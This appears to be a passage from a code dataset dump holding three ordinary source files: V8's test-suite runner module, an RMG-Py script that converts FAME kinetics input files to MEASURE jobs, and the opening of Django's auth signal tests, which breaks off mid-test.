repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
weolar/miniblink49 | v8_5_1/tools/testrunner/local/testsuite.py | 6 | 11182 | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
# Use this to run several variants of the tests.
# Maps variant name -> list of flag sets; each inner list is one extra set of
# d8 flags appended to a test's command line for that variant.
ALL_VARIANT_FLAGS = {
  "default": [[]],
  "stress": [["--stress-opt", "--always-opt"]],
  "turbofan": [["--turbo"]],
  "turbofan_opt": [["--turbo", "--always-opt"]],
  "nocrankshaft": [["--nocrankshaft"]],
  "ignition": [["--ignition", "--turbo"]],
  "preparser": [["--min-preparse-length=0"]],
}

# FAST_VARIANTS implies no --always-opt.
FAST_VARIANT_FLAGS = {
  "default": [[]],
  "stress": [["--stress-opt"]],
  "turbofan": [["--turbo"]],
  "nocrankshaft": [["--nocrankshaft"]],
  "ignition": [["--ignition", "--turbo"]],
  "preparser": [["--min-preparse-length=0"]],
}

# Every variant name the runner knows about (keys of ALL_VARIANT_FLAGS).
ALL_VARIANTS = set(["default", "stress", "turbofan", "turbofan_opt",
                    "nocrankshaft", "ignition", "preparser"])
# Subset used for tests marked as fast-variants-only in the status file.
FAST_VARIANTS = set(["default", "turbofan"])
# Subset used for tests restricted to the standard variant only.
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
  """Chooses which testing variants (and their flag sets) apply to a test."""

  def __init__(self, suite, variants):
    self.suite = suite
    # Restrict the globally known variant sets to the ones requested.
    self.all_variants = ALL_VARIANTS & variants
    self.fast_variants = FAST_VARIANTS & variants
    self.standard_variant = STANDARD_VARIANT & variants

  def FilterVariantsByTest(self, testcase):
    """Return the variant subset allowed by the test's status-file outcomes."""
    outcomes = testcase.outcomes
    if outcomes:
      if statusfile.OnlyStandardVariant(outcomes):
        return self.standard_variant
      if statusfile.OnlyFastVariants(outcomes):
        return self.fast_variants
    return self.all_variants

  def GetFlagSets(self, testcase, variant):
    """Return the flag sets for |variant|, honoring fast-variant outcomes."""
    outcomes = testcase.outcomes
    fast_only = bool(outcomes) and statusfile.OnlyFastVariants(outcomes)
    flag_table = FAST_VARIANT_FLAGS if fast_only else ALL_VARIANT_FLAGS
    return flag_table[variant]
class TestSuite(object):
  """A collection of test cases known to the test runner.

  A suite lazily loads its list of tests and its .status file, and can
  filter the tests by status-file outcomes or by command-line arguments.
  """

  @staticmethod
  def LoadTestSuite(root, global_init=True):
    """Instantiate the suite rooted at |root| via its testcfg.py module.

    Falls back to a GoogleTestSuite when no testcfg module is present.
    NOTE(review): |global_init| is accepted but unused here -- confirm
    whether callers still pass it.
    """
    # The suite's name is the last component of its root directory path.
    name = root.split(os.path.sep)[-1]
    f = None
    try:
      (f, pathname, description) = imp.find_module("testcfg", [root])
      module = imp.load_module("testcfg", f, pathname, description)
      return module.GetSuite(name, root)
    except ImportError:
      # Use default if no testcfg is present.
      return GoogleTestSuite(name, root)
    finally:
      if f:
        f.close()

  def __init__(self, name, root):
    # Note: This might be called concurrently from different processes.
    self.name = name  # string
    self.root = root  # string containing path
    self.tests = None  # list of TestCase objects
    self.rules = None  # dictionary mapping test path to list of outcomes
    self.wildcards = None  # dictionary mapping test paths to list of outcomes
    self.total_duration = None  # float, assigned on demand

  def shell(self):
    """Name of the executable that runs this suite's tests."""
    return "d8"

  def suffix(self):
    """File-name suffix of this suite's test files."""
    return ".js"

  def status_file(self):
    """Path to the .status file listing expected outcomes for this suite."""
    return "%s/%s.status" % (self.root, self.name)

  # Used in the status file and for stdout printing.
  def CommonTestName(self, testcase):
    if utils.IsWindows():
      # Normalize to forward slashes so names match status-file entries.
      return testcase.path.replace("\\", "/")
    else:
      return testcase.path

  def ListTests(self, context):
    """Return the list of TestCase objects; implemented by subclasses."""
    raise NotImplementedError

  def _VariantGeneratorFactory(self):
    """The variant generator class to be used."""
    return VariantGenerator

  def CreateVariantGenerator(self, variants):
    """Return a generator for the testing variants of this suite.

    Args:
      variants: List of variant names to be run as specified by the test
                runner.
    Returns: An object of type VariantGenerator.
    """
    return self._VariantGeneratorFactory()(self, set(variants))

  def DownloadData(self):
    # Suites with external test data override this; default is a no-op.
    pass

  def ReadStatusFile(self, variables):
    """Parse the status file into exact-match rules and wildcard rules."""
    (self.rules, self.wildcards) = \
        statusfile.ReadStatusFile(self.status_file(), variables)

  def ReadTestCases(self, context):
    self.tests = self.ListTests(context)

  @staticmethod
  def _FilterSlow(slow, mode):
    # True means "drop this test" under the given slow_tests mode.
    return (mode == "run" and not slow) or (mode == "skip" and slow)

  @staticmethod
  def _FilterPassFail(pass_fail, mode):
    # True means "drop this test" under the given pass_fail_tests mode.
    return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)

  def FilterTestCasesByStatus(self, warn_unused_rules,
                              slow_tests="dontcare",
                              pass_fail_tests="dontcare"):
    """Drop tests skipped by the status file or excluded by the slow /
    pass-fail modes; attaches outcomes (and any extra flags) to the
    surviving TestCase objects as a side effect."""
    filtered = []
    used_rules = set()
    for t in self.tests:
      slow = False
      pass_fail = False
      testname = self.CommonTestName(t)
      if testname in self.rules:
        used_rules.add(testname)
        # Even for skipped tests, as the TestCase object stays around and
        # PrintReport() uses it.
        t.outcomes = self.rules[testname]
        if statusfile.DoSkip(t.outcomes):
          continue  # Don't add skipped tests to |filtered|.
        # A "Flags: ..." outcome smuggles extra command-line flags into the
        # test case.
        for outcome in t.outcomes:
          if outcome.startswith('Flags: '):
            t.flags += outcome[7:].split()
        slow = statusfile.IsSlow(t.outcomes)
        pass_fail = statusfile.IsPassOrFail(t.outcomes)
      skip = False
      for rule in self.wildcards:
        assert rule[-1] == '*'
        if testname.startswith(rule[:-1]):
          used_rules.add(rule)
          t.outcomes |= self.wildcards[rule]
          if statusfile.DoSkip(t.outcomes):
            skip = True
            break  # "for rule in self.wildcards"
          slow = slow or statusfile.IsSlow(t.outcomes)
          pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
      if (skip
          or self._FilterSlow(slow, slow_tests)
          or self._FilterPassFail(pass_fail, pass_fail_tests)):
        continue  # "for t in self.tests"
      filtered.append(t)
    self.tests = filtered

    if not warn_unused_rules:
      return
    # Report status-file entries that matched no test; they are usually
    # left over from renamed or deleted tests.
    for rule in self.rules:
      if rule not in used_rules:
        print("Unused rule: %s -> %s" % (rule, self.rules[rule]))
    for rule in self.wildcards:
      if rule not in used_rules:
        print("Unused rule: %s -> %s" % (rule, self.wildcards[rule]))

  def FilterTestCasesByArgs(self, args):
    """Filter test cases based on command-line arguments.

    An argument with an asterisk in the end will match all test cases
    that have the argument as a prefix. Without asterisk, only exact matches
    will be used with the exception of the test-suite name as argument.
    """
    filtered = []
    globs = []
    exact_matches = []
    for a in args:
      argpath = a.split('/')
      if argpath[0] != self.name:
        continue
      if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
        return  # Don't filter, run all tests in this suite.
      path = '/'.join(argpath[1:])
      if path[-1] == '*':
        path = path[:-1]
        globs.append(path)
      else:
        exact_matches.append(path)
    for t in self.tests:
      for a in globs:
        if t.path.startswith(a):
          filtered.append(t)
          break
      for a in exact_matches:
        if t.path == a:
          filtered.append(t)
          break
    self.tests = filtered

  def GetFlagsForTestCase(self, testcase, context):
    """Return command-line flags for |testcase|; implemented by subclasses."""
    raise NotImplementedError

  def GetSourceForTest(self, testcase):
    return "(no source available)"

  def IsFailureOutput(self, testcase):
    return testcase.output.exit_code != 0

  def IsNegativeTest(self, testcase):
    # Negative tests are expected to fail; subclasses override as needed.
    return False

  def HasFailed(self, testcase):
    execution_failed = self.IsFailureOutput(testcase)
    if self.IsNegativeTest(testcase):
      # For a negative test, a "failing" run is the expected (passing) case.
      return not execution_failed
    else:
      return execution_failed

  def GetOutcome(self, testcase):
    """Classify the test run as CRASH, TIMEOUT, FAIL or PASS."""
    if testcase.output.HasCrashed():
      return statusfile.CRASH
    elif testcase.output.HasTimedOut():
      return statusfile.TIMEOUT
    elif self.HasFailed(testcase):
      return statusfile.FAIL
    else:
      return statusfile.PASS

  def HasUnexpectedOutput(self, testcase):
    outcome = self.GetOutcome(testcase)
    # With no explicit outcomes, only PASS is expected.
    return not outcome in (testcase.outcomes or [statusfile.PASS])

  def StripOutputForTransmit(self, testcase):
    # Drop bulky stdout/stderr for expected results before sending the
    # test case between processes.
    if not self.HasUnexpectedOutput(testcase):
      testcase.output.stdout = ""
      testcase.output.stderr = ""

  def CalculateTotalDuration(self):
    """Sum the durations of all tests; caches the result on the suite."""
    self.total_duration = 0.0
    for t in self.tests:
      self.total_duration += t.duration
    return self.total_duration
class StandardVariantGenerator(VariantGenerator):
  """Variant generator that always restricts runs to the standard variant."""

  def FilterVariantsByTest(self, testcase):
    # The test's status-file outcomes are deliberately ignored here.
    return self.standard_variant
class GoogleTestSuite(TestSuite):
  """Suite whose tests live inside a googletest binary.

  The list of tests is obtained by running the binary with
  --gtest_list_tests and parsing its stdout.
  """

  def __init__(self, name, root):
    super(GoogleTestSuite, self).__init__(name, root)

  def ListTests(self, context):
    """Run the shell with --gtest_list_tests and parse the test names.

    Raises an Exception if the executable fails to produce the list.
    """
    shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
    if utils.IsWindows():
      shell += ".exe"
    output = commands.Execute(context.command_prefix +
                              [shell, "--gtest_list_tests"] +
                              context.extra_flags)
    if output.exit_code != 0:
      # print() call form for consistency with the rest of this file.
      print(output.stdout)
      print(output.stderr)
      raise Exception("Test executable failed to list the tests.")
    tests = []
    test_case = ''
    for line in output.stdout.splitlines():
      # Guard against blank lines: the original line.strip().split()[0]
      # raised IndexError on them.
      words = line.strip().split()
      if not words:
        continue
      test_desc = words[0]
      if test_desc.endswith('.'):
        # Lines ending in '.' name a test case (fixture); the indented
        # lines that follow name the tests within it.
        test_case = test_desc
      elif test_case and test_desc:
        test = testcase.TestCase(self, test_case + test_desc)
        tests.append(test)
    tests.sort(key=lambda t: t.path)
    return tests

  def GetFlagsForTestCase(self, testcase, context):
    """Flags that run exactly |testcase| with a fixed seed and no timing."""
    return (testcase.flags + ["--gtest_filter=" + testcase.path] +
            ["--gtest_random_seed=%s" % context.random_seed] +
            ["--gtest_print_time=0"] +
            context.mode_flags)

  def _VariantGeneratorFactory(self):
    # gtest binaries are only run in the standard variant.
    return StandardVariantGenerator

  def shell(self):
    return self.name
| apache-2.0 |
comocheng/RMG-Py | convertFAME.py | 4 | 18608 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Convert a FAME input file to a MEASURE input file.
"""
import argparse
import logging
import numpy
import os.path
from rmgpy.molecule import Molecule
import rmgpy.constants as constants
from rmgpy.quantity import Quantity, Energy
from rmgpy.cantherm.main import CanTherm
from rmgpy.cantherm.pdep import PressureDependenceJob
from rmgpy.pdep import Network, Configuration, SingleExponentialDown
from rmgpy.species import Species, TransitionState
from rmgpy.reaction import Reaction
from rmgpy.transport import TransportData
from rmgpy.statmech import HarmonicOscillator, HinderedRotor, Conformer
from rmgpy.thermo import ThermoData
from rmgpy.kinetics import Arrhenius
################################################################################
def parseCommandLineArguments():
    """
    Parse the command-line arguments being passed to MEASURE. These are
    described in the module docstring.

    Returns the parsed ``argparse.Namespace`` with attributes ``file``,
    ``dictionary`` and ``max_energy``.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument('file', metavar='FILE', type=str, nargs='+',
                     help='a file to convert')
    cli.add_argument('-d', '--dictionary', metavar='DICTFILE', type=str,
                     nargs=1,
                     help='the RMG dictionary corresponding to these files')
    cli.add_argument('-x', '--max-energy', metavar='VALUE UNITS', type=str,
                     nargs=2,
                     help='A maximum energy to crop at')
    return cli.parse_args()
################################################################################
def loadFAMEInput(path, moleculeDict=None):
    """
    Load the contents of a FAME input file into the MEASURE object. FAME
    is an early version of MEASURE written in Fortran and used by RMG-Java.
    This script enables importing FAME input files into MEASURE so we can
    use the additional functionality that MEASURE provides. Note that it
    is mostly designed to load the FAME input files generated automatically
    by RMG-Java, and may not load hand-crafted FAME input files. If you
    specify a `moleculeDict`, then this script will use it to associate
    the species with their structures.

    Returns a fully populated PressureDependenceJob.
    """

    def readMeaningfulLine(f):
        # Return the next stripped, non-blank, non-comment ('#') line,
        # or '' at end of file. The FAME format is strictly sequential,
        # so all parsing below is driven by repeated calls to this helper.
        line = f.readline()
        while line != '':
            line = line.strip()
            if len(line) > 0 and line[0] != '#':
                return line
            else:
                line = f.readline()
        return ''

    moleculeDict = moleculeDict or {}

    logging.info('Loading file "{0}"...'.format(path))
    f = open(path)

    job = PressureDependenceJob(network=None)

    # Read method
    method = readMeaningfulLine(f).lower()
    if method == 'modifiedstrongcollision':
        job.method = 'modified strong collision'
    elif method == 'reservoirstate':
        job.method = 'reservoir state'

    # Read temperatures
    Tcount, Tunits, Tmin, Tmax = readMeaningfulLine(f).split()
    job.Tmin = Quantity(float(Tmin), Tunits)
    job.Tmax = Quantity(float(Tmax), Tunits)
    job.Tcount = int(Tcount)
    Tlist = []
    for i in range(int(Tcount)):
        Tlist.append(float(readMeaningfulLine(f)))
    job.Tlist = Quantity(Tlist, Tunits)

    # Read pressures
    Pcount, Punits, Pmin, Pmax = readMeaningfulLine(f).split()
    job.Pmin = Quantity(float(Pmin), Punits)
    job.Pmax = Quantity(float(Pmax), Punits)
    job.Pcount = int(Pcount)
    Plist = []
    for i in range(int(Pcount)):
        Plist.append(float(readMeaningfulLine(f)))
    job.Plist = Quantity(Plist, Punits)

    # Read interpolation model
    model = readMeaningfulLine(f).split()
    if model[0].lower() == 'chebyshev':
        job.interpolationModel = ('chebyshev', int(model[1]), int(model[2]))
    elif model[0].lower() == 'pdeparrhenius':
        job.interpolationModel = ('pdeparrhenius',)

    # Read grain size or number of grains (two lines, in either order)
    job.minimumGrainCount = 0
    job.maximumGrainSize = None
    for i in range(2):
        data = readMeaningfulLine(f).split()
        if data[0].lower() == 'numgrains':
            job.minimumGrainCount = int(data[1])
        elif data[0].lower() == 'grainsize':
            job.maximumGrainSize = (float(data[2]), data[1])

    # A FAME file is almost certainly created during an RMG job, so use RMG mode
    job.rmgmode = True

    # Create the Network
    job.network = Network()

    # Read collision model
    data = readMeaningfulLine(f)
    assert data.lower() == 'singleexpdown'
    alpha0units, alpha0 = readMeaningfulLine(f).split()
    T0units, T0 = readMeaningfulLine(f).split()
    n = readMeaningfulLine(f)
    # One energy-transfer model is shared by the bath gas and all species.
    energyTransferModel = SingleExponentialDown(
        alpha0 = Quantity(float(alpha0), alpha0units),
        T0 = Quantity(float(T0), T0units),
        n = float(n),
    )

    speciesDict = {}

    # Read bath gas parameters
    bathGas = Species(label='bath_gas', energyTransferModel=energyTransferModel)
    molWtunits, molWt = readMeaningfulLine(f).split()
    if molWtunits == 'u': molWtunits = 'amu'
    bathGas.molecularWeight = Quantity(float(molWt), molWtunits)
    sigmaLJunits, sigmaLJ = readMeaningfulLine(f).split()
    epsilonLJunits, epsilonLJ = readMeaningfulLine(f).split()
    assert epsilonLJunits == 'J'
    bathGas.transportData = TransportData(
        sigma = Quantity(float(sigmaLJ), sigmaLJunits),
        # FAME stores the LJ well depth in J; convert to a temperature in K.
        epsilon = Quantity(float(epsilonLJ) / constants.kB, 'K'),
    )
    job.network.bathGas = {bathGas: 1.0}

    # Read species data
    Nspec = int(readMeaningfulLine(f))
    for i in range(Nspec):
        species = Species()
        species.conformer = Conformer()
        species.energyTransferModel = energyTransferModel

        # Read species label
        species.label = readMeaningfulLine(f)
        speciesDict[species.label] = species
        if species.label in moleculeDict:
            species.molecule = [moleculeDict[species.label]]

        # Read species E0
        E0units, E0 = readMeaningfulLine(f).split()
        species.conformer.E0 = Quantity(float(E0), E0units)
        species.conformer.E0.units = 'kJ/mol'

        # Read species thermo data
        H298units, H298 = readMeaningfulLine(f).split()
        S298units, S298 = readMeaningfulLine(f).split()
        Cpcount, Cpunits = readMeaningfulLine(f).split()
        Cpdata = []
        # NOTE: this inner loop reuses the outer loop variable `i`; harmless
        # because `i` is not referenced again in this iteration.
        for i in range(int(Cpcount)):
            Cpdata.append(float(readMeaningfulLine(f)))
        if S298units == 'J/mol*K': S298units = 'J/(mol*K)'
        if Cpunits == 'J/mol*K': Cpunits = 'J/(mol*K)'
        species.thermo = ThermoData(
            H298 = Quantity(float(H298), H298units),
            S298 = Quantity(float(S298), S298units),
            # FAME always tabulates Cp at these seven temperatures.
            Tdata = Quantity([300,400,500,600,800,1000,1500], "K"),
            Cpdata = Quantity(Cpdata, Cpunits),
            Cp0 = (Cpdata[0], Cpunits),
            CpInf = (Cpdata[-1], Cpunits),
        )

        # Read species collision parameters
        molWtunits, molWt = readMeaningfulLine(f).split()
        if molWtunits == 'u': molWtunits = 'amu'
        species.molecularWeight = Quantity(float(molWt), molWtunits)
        sigmaLJunits, sigmaLJ = readMeaningfulLine(f).split()
        epsilonLJunits, epsilonLJ = readMeaningfulLine(f).split()
        assert epsilonLJunits == 'J'
        species.transportData = TransportData(
            sigma = Quantity(float(sigmaLJ), sigmaLJunits),
            epsilon = Quantity(float(epsilonLJ) / constants.kB, 'K'),
        )

        # Read species vibrational frequencies
        freqCount, freqUnits = readMeaningfulLine(f).split()
        frequencies = []
        for j in range(int(freqCount)):
            frequencies.append(float(readMeaningfulLine(f)))
        species.conformer.modes.append(HarmonicOscillator(
            frequencies = Quantity(frequencies, freqUnits),
        ))

        # Read species external rotors
        rotCount, rotUnits = readMeaningfulLine(f).split()
        if int(rotCount) > 0:
            raise NotImplementedError('Cannot handle external rotational modes in FAME input.')

        # Read species internal rotors
        freqCount, freqUnits = readMeaningfulLine(f).split()
        frequencies = []
        for j in range(int(freqCount)):
            frequencies.append(float(readMeaningfulLine(f)))
        barrCount, barrUnits = readMeaningfulLine(f).split()
        barriers = []
        for j in range(int(barrCount)):
            barriers.append(float(readMeaningfulLine(f)))
        # Normalize barrier heights to J/mol regardless of input units.
        if barrUnits == 'cm^-1':
            barrUnits = 'J/mol'
            barriers = [barr * constants.h * constants.c * constants.Na * 100. for barr in barriers]
        elif barrUnits in ['Hz', 's^-1']:
            barrUnits = 'J/mol'
            barriers = [barr * constants.h * constants.Na for barr in barriers]
        elif barrUnits != 'J/mol':
            raise Exception('Unexpected units "{0}" for hindered rotor barrier height.'.format(barrUnits))
        # Back out the reduced moment of inertia from frequency and barrier.
        inertia = [V0 / 2.0 / (nu * constants.c * 100.)**2 / constants.Na for nu, V0 in zip(frequencies, barriers)]
        for I, V0 in zip(inertia, barriers):
            species.conformer.modes.append(HinderedRotor(
                inertia = Quantity(I,"kg*m^2"),
                barrier = Quantity(V0,barrUnits),
                symmetry = 1,
                semiclassical = False,
            ))

        # Read overall symmetry number
        # NOTE(review): the value is stored as spinMultiplicity although the
        # FAME field is described as a symmetry number -- confirm intent.
        species.conformer.spinMultiplicity = int(readMeaningfulLine(f))

    # Read isomer, reactant channel, and product channel data
    Nisom = int(readMeaningfulLine(f))
    Nreac = int(readMeaningfulLine(f))
    Nprod = int(readMeaningfulLine(f))
    for i in range(Nisom):
        data = readMeaningfulLine(f).split()
        assert data[0] == '1'
        job.network.isomers.append(speciesDict[data[1]])
    for i in range(Nreac):
        data = readMeaningfulLine(f).split()
        assert data[0] == '2'
        job.network.reactants.append([speciesDict[data[1]], speciesDict[data[2]]])
    for i in range(Nprod):
        data = readMeaningfulLine(f).split()
        if data[0] == '1':
            job.network.products.append([speciesDict[data[1]]])
        elif data[0] == '2':
            job.network.products.append([speciesDict[data[1]], speciesDict[data[2]]])

    # Read path reactions
    Nrxn = int(readMeaningfulLine(f))
    for i in range(Nrxn):

        # Read and ignore reaction equation
        equation = readMeaningfulLine(f)
        reaction = Reaction(transitionState=TransitionState(), reversible=True)
        job.network.pathReactions.append(reaction)
        reaction.transitionState.conformer = Conformer()

        # Read reactant and product indices; FAME numbers configurations
        # 1-based in the order isomers, reactants, products.
        data = readMeaningfulLine(f).split()
        reac = int(data[0]) - 1
        prod = int(data[1]) - 1
        if reac < Nisom:
            reaction.reactants = [job.network.isomers[reac]]
        elif reac < Nisom+Nreac:
            reaction.reactants = job.network.reactants[reac-Nisom]
        else:
            reaction.reactants = job.network.products[reac-Nisom-Nreac]
        if prod < Nisom:
            reaction.products = [job.network.isomers[prod]]
        elif prod < Nisom+Nreac:
            reaction.products = job.network.reactants[prod-Nisom]
        else:
            reaction.products = job.network.products[prod-Nisom-Nreac]

        # Read reaction E0 (transition state energy)
        E0units, E0 = readMeaningfulLine(f).split()
        reaction.transitionState.conformer.E0 = Quantity(float(E0), E0units)
        reaction.transitionState.conformer.E0.units = 'kJ/mol'

        # Read high-pressure limit kinetics
        data = readMeaningfulLine(f)
        assert data.lower() == 'arrhenius'
        Aunits, A = readMeaningfulLine(f).split()
        # Parenthesize compound units, e.g. "m^3/mol*s" -> "m^3/(mol*s)".
        if '/' in Aunits:
            index = Aunits.find('/')
            Aunits = '{0}/({1})'.format(Aunits[0:index], Aunits[index+1:])
        Eaunits, Ea = readMeaningfulLine(f).split()
        n = readMeaningfulLine(f)
        reaction.kinetics = Arrhenius(
            A = Quantity(float(A), Aunits),
            Ea = Quantity(float(Ea), Eaunits),
            n = Quantity(float(n)),
        )
        reaction.kinetics.Ea.units = 'kJ/mol'

    f.close()

    # Wrap the raw species (lists) read above into Configuration objects.
    job.network.isomers = [Configuration(isomer) for isomer in job.network.isomers]
    job.network.reactants = [Configuration(*reactants) for reactants in job.network.reactants]
    job.network.products = [Configuration(*products) for products in job.network.products]

    return job
def pruneNetwork(network, Emax):
    """
    Prune the network by removing any configurations with ground-state energy
    above `Emax` in J/mol and any reactions with transition state energy above
    `Emax` from the network. All reactions involving removed configurations
    are also removed. Any configurations that have zero reactions as a result
    of this process are also removed.
    """

    # Remove configurations with ground-state energies above the given Emax
    isomersToRemove = []
    for isomer in network.isomers:
        if isomer.E0 > Emax:
            isomersToRemove.append(isomer)
    for isomer in isomersToRemove:
        network.isomers.remove(isomer)

    reactantsToRemove = []
    for reactant in network.reactants:
        if reactant.E0 > Emax:
            reactantsToRemove.append(reactant)
    for reactant in reactantsToRemove:
        network.reactants.remove(reactant)

    productsToRemove = []
    for product in network.products:
        if product.E0 > Emax:
            productsToRemove.append(product)
    for product in productsToRemove:
        network.products.remove(product)

    # Remove path reactions involving the removed configurations
    # NOTE(review): each entry of removedConfigurations is a list of Species
    # (configuration.species), and rxn.reactants/products are compared to it
    # via list equality -- this assumes identical species ordering; confirm.
    removedConfigurations = []
    removedConfigurations.extend([isomer.species for isomer in isomersToRemove])
    removedConfigurations.extend([reactant.species for reactant in reactantsToRemove])
    removedConfigurations.extend([product.species for product in productsToRemove])
    reactionsToRemove = []
    for rxn in network.pathReactions:
        if rxn.reactants in removedConfigurations or rxn.products in removedConfigurations:
            reactionsToRemove.append(rxn)
    for rxn in reactionsToRemove:
        network.pathReactions.remove(rxn)

    # Remove path reactions with barrier heights above the given Emax
    reactionsToRemove = []
    for rxn in network.pathReactions:
        if rxn.transitionState.conformer.E0.value_si > Emax:
            reactionsToRemove.append(rxn)
    for rxn in reactionsToRemove:
        network.pathReactions.remove(rxn)

    def ismatch(speciesList1, speciesList2):
        # Order-insensitive identity comparison of two species lists;
        # supports lists of up to three species (all permutations spelled
        # out explicitly). Longer or mismatched lists never match.
        if len(speciesList1) == len(speciesList2) == 1:
            return (speciesList1[0] is speciesList2[0])
        elif len(speciesList1) == len(speciesList2) == 2:
            return ((speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[1]) or
                    (speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[0]))
        elif len(speciesList1) == len(speciesList2) == 3:
            return ((speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[1] and speciesList1[2] is speciesList2[2]) or
                    (speciesList1[0] is speciesList2[0] and speciesList1[1] is speciesList2[2] and speciesList1[2] is speciesList2[1]) or
                    (speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[0] and speciesList1[2] is speciesList2[2]) or
                    (speciesList1[0] is speciesList2[1] and speciesList1[1] is speciesList2[2] and speciesList1[2] is speciesList2[0]) or
                    (speciesList1[0] is speciesList2[2] and speciesList1[1] is speciesList2[0] and speciesList1[2] is speciesList2[1]) or
                    (speciesList1[0] is speciesList2[2] and speciesList1[1] is speciesList2[1] and speciesList1[2] is speciesList2[0]))
        else:
            return False

    # Remove orphaned configurations (those with zero path reactions involving them)
    # Each for/else below runs the else (mark for removal) only when no path
    # reaction references the configuration.
    isomersToRemove = []
    for isomer in network.isomers:
        for rxn in network.pathReactions:
            if ismatch(rxn.reactants, isomer.species) or ismatch(rxn.products, isomer.species):
                break
        else:
            isomersToRemove.append(isomer)
    for isomer in isomersToRemove:
        network.isomers.remove(isomer)

    reactantsToRemove = []
    for reactant in network.reactants:
        for rxn in network.pathReactions:
            if ismatch(rxn.reactants, reactant.species) or ismatch(rxn.products, reactant.species):
                break
        else:
            reactantsToRemove.append(reactant)
    for reactant in reactantsToRemove:
        network.reactants.remove(reactant)

    productsToRemove = []
    for product in network.products:
        for rxn in network.pathReactions:
            if ismatch(rxn.reactants, product.species) or ismatch(rxn.products, product.species):
                break
        else:
            productsToRemove.append(product)
    for product in productsToRemove:
        network.products.remove(product)
################################################################################
if __name__ == '__main__':

    # Parse the command-line arguments
    args = parseCommandLineArguments()
    if args.max_energy:
        # Convert the (value, units) pair to SI (J/mol) for pruning.
        Emax = float(args.max_energy[0])
        Eunits = str(args.max_energy[1])
        Emax = Energy(Emax, Eunits).value_si
    else:
        Emax = None

    # Load RMG dictionary if specified
    moleculeDict = {}
    if args.dictionary is not None:
        f = open(args.dictionary[0])
        adjlist = ''; label = ''
        # The dictionary is a series of adjacency-list blocks separated by
        # blank lines; the first line of each block is the species label.
        for line in f:
            if len(line.strip()) == 0:
                if len(adjlist.strip()) > 0:
                    molecule = Molecule()
                    molecule.fromAdjacencyList(adjlist)
                    moleculeDict[label] = molecule
                adjlist = ''; label = ''
            else:
                if len(adjlist.strip()) == 0:
                    label = line.strip()
                adjlist += line
        f.close()

    # NOTE(review): `method` appears unused below -- confirm before removing.
    method = None

    for fstr in args.file:

        # Construct CanTherm job from FAME input
        job = loadFAMEInput(fstr, moleculeDict)
        if Emax is not None:
            pruneNetwork(job.network, Emax)

        # Save MEASURE input file based on the above
        dirname, basename = os.path.split(os.path.abspath(fstr))
        basename, ext = os.path.splitext(basename)
        path = os.path.join(dirname, basename + '.py')
        job.saveInputFile(path)
| mit |
whs/django | tests/auth_tests/test_signals.py | 9 | 4459 | from django.apps import apps
from django.contrib.auth import authenticate, signals
from django.contrib.auth.models import User
from django.core.exceptions import FieldDoesNotExist
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from .models import MinimalUser
@override_settings(ROOT_URLCONF='auth_tests.urls')
class SignalTestCase(TestCase):
    """Tests that the auth signals (user_logged_in, user_logged_out,
    user_login_failed) fire with the expected payloads."""

    @classmethod
    def setUpTestData(cls):
        cls.u1 = User.objects.create_user(username='testclient', password='password')
        cls.u3 = User.objects.create_user(username='staff', password='password')

    def listener_login(self, user, **kwargs):
        # Signal receiver: record each successfully logged-in user.
        self.logged_in.append(user)

    def listener_logout(self, user, **kwargs):
        # Signal receiver: record each logged-out user (None for anonymous).
        self.logged_out.append(user)

    def listener_login_failed(self, sender, **kwargs):
        # Signal receiver: record the kwargs of each failed login attempt.
        self.login_failed.append(kwargs)

    def setUp(self):
        """Set up the listeners and reset the logged in/logged out counters"""
        self.logged_in = []
        self.logged_out = []
        self.login_failed = []
        signals.user_logged_in.connect(self.listener_login)
        signals.user_logged_out.connect(self.listener_logout)
        signals.user_login_failed.connect(self.listener_login_failed)

    def tearDown(self):
        """Disconnect the listeners"""
        signals.user_logged_in.disconnect(self.listener_login)
        signals.user_logged_out.disconnect(self.listener_logout)
        signals.user_login_failed.disconnect(self.listener_login_failed)

    def test_login(self):
        # Only a successful login will trigger the success signal.
        self.client.login(username='testclient', password='bad')
        self.assertEqual(len(self.logged_in), 0)
        self.assertEqual(len(self.login_failed), 1)
        self.assertEqual(self.login_failed[0]['credentials']['username'], 'testclient')
        # verify the password is cleansed
